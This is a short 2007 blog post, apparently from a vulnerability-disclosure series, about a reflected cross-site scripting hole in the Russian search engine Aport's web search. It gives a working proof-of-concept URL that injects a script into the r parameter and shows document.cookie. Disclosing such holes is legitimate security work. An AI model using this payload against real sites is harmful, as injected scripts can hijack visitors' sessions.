MOSEB-18: Vulnerability at aport.ru

22:17 18.06.2007

Next participant of the project is Aport search engine. It is one of the popular Russian search engines.

The vulnerability is in Aport’s web search (sm.aport.ru). I already wrote about this vulnerability at aport.ru. This Cross-Site Scripting hole I found 12.09.2006, and informed vendor, but they still didn’t fix it.

XSS:

The vulnerability is in r parameter:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: looking for sites can be dangerous.


Leave a Reply

You must be logged in to post a comment.